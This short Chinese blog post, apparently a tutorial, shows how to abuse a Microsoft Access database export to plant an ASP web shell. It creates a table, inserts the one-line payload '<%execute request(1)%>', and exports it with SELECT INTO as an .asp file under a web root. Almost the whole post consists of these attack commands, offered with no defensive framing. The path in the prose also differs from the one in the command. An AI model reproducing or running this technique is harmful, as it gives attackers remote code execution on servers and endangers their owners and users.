access数据库导出数据表内容到根目录

创建表a1字段b

create table a1(b text)

像表a1字段b里面写入数据

insert into a1 (b) values('<%execute request(1)%>')

把写入的数据导出到D:\web\11.asp

SELECT b into [<%execute request(1)%>] in 'D:\\www\\11.asp' 'EXCEL 4.0' from a1

至此,需要导出的数据完成

 

 

 

 

THE END
分享
二维码
海报
access数据库导出数据表内容到根目录
创建表a1字段b create table a1(b text) 像表a1字段b里面写入数据 insert into a1 (b) values('<%execute request(1)%>') 把写入的数据导出到D:\web\11.asp SELECT b into [<%execute request(1)%>] i……
<<上一篇
下一篇>>